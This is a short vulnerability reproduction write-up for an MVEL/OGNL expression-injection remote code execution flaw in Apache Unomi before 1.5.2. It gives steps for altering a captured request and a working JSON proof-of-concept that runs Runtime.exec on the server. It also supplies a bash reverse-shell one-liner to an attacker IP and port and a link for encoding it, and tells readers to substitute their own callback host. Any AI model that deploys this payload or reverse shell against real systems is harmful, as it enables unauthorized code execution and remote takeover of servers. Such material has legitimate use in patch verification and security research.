Introduction
Apache Unomi is a Java open source customer data platform, which is a Java server designed to manage the data of customers, prospects and visitors and help personalize the customer experience. Unomi can be used to integrate personalization and profile management in very different systems (such as CMS, CRM, issue tracker, native mobile apps, etc.).
Vulnerability description
Apache Unomi allows remote attackers to send malicious requests using MVEL and OGNL expressions that may contain arbitrary classes, resulting in remote code execution (RCE) with Unomi application privileges.
Affected version
Apache Unomi < 1.5.2
Vulnerability recurrence
Capture the packet on the homepage:
modify the data packet:
Keep the following fields:
Change the method to POST and add:
Content-Type:application/json
Content-Length: 0
Add POC:
{
"filters": [
{
"id": "sample",
"filters": [
{
"condition": {
"parameterValues": {
"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"ping DNSlog\");"
},
"type":"profilePropertyCondition"
}
}
]
}
],
"sessionId": "sample"
}
Modify DNSlog to your own.
View the result:
Reverse shell:
To encode the reverse shell command:
bash -i >&/dev/tcp/192.168.133.149/7777 0>&1
Coding address http://www.jackson-t.ca/runtime-exec-payloads.html
Kali monitors: